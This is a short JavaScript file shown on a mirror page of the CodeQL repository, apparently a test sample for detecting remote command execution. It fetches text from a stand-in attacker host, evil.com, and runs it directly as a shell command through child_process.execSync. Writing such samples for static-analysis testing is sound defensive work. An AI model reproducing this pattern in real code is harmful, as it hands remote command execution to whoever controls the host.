mirror of
https://github.com/github/codeql.git
synced 2025-12-18 01:33:15 +01:00
9 lines
186 B
JavaScript
9 lines
186 B
JavaScript
let https = require("https"),
|
|
cp = require("child_process");
|
|
|
|
https.get("https://evil.com/getCommand", res =>
|
|
res.on("data", command => {
|
|
cp.execSync(command);
|
|
})
|
|
);
|